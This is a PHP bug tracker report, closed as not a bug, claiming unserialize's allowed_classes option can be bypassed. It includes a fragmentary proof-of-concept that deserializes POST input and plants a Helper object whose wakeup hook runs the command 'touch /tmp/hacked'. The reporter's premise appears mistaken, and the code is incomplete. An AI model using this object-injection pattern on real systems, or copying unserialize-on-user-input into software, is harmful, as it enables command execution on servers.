|  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #79429 $options parameter of unserialize is ignored
Submitted: 2020-03-29 17:52 UTC Modified: 2020-03-30 11:25 UTC
From: fady dot mohamed dot osman at gmail dot com Assigned: cmb (profile)
Status: Not a bug Package: Unknown/Other Function
PHP Version: Irrelevant OS: Linux
Private report: No CVE-ID: None
 [2020-03-29 17:52 UTC] fady dot mohamed dot osman at gmail dot com
Not sure if this is expected behavior but it seems odd, the second parameter of unserialize is completely useless, any class can be easily loaded even if not defined in the array (second parameter of unserialize), this is due to the following:

* PHP automatically defines a member variable if it doesn't exist in the class definition.
* Unserialize does the same if undefined value was provided it will define it and if it's a class it will create an object without checking if it's in the whitelist.

By providing a dummy variable that doesn't exist in a class that is allowed by the second parameter of an allowed class we can deserialize any class of our choice.

Test script:
-- Code that does the deserialization --

class Helper
public $dummy = "asdasd";
public $exec = "ls";

public function __wakeup()

class MayBe {
	public $myvar = "OK";

if(isset($_POST["serialized"])) {
  $message = "Data was unserialized!!";

-- Code to generate a serialized string that will bypass the check ---
$myhelper = new Helper;
$myclass = new  MayBe;

$myclass->myvar = "WOW";

$myhelper->exec = "touch /tmp/hacked";

//This is not defined in the MayBe class but will automatically defined upon deserialization.
$myclass->dummy = $myhelper;

echo serialize($myclass);


Expected result:
The method shouldn't deserialize a class that is not in the list.

Actual result:
Any class can be deserialized regardless of the second argument of unserialize.


Add a Patch

Pull Requests

Add a Pull Request


AllCommentsChangesGit/SVN commitsRelated reports
 [2020-03-30 11:25 UTC]
-Status: Open +Status: Not a bug -Type: Security +Type: Bug -Assigned To: +Assigned To: cmb
 [2020-03-30 11:25 UTC]
Thank you for taking the time to write to us, but this is not
a bug. Please double-check the documentation available at and the instructions on how to report
a bug at

unserialize($_POST["serialized"],['allowed_classes' => "MayBe"]);
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Wed May 29 09:01:33 2024 UTC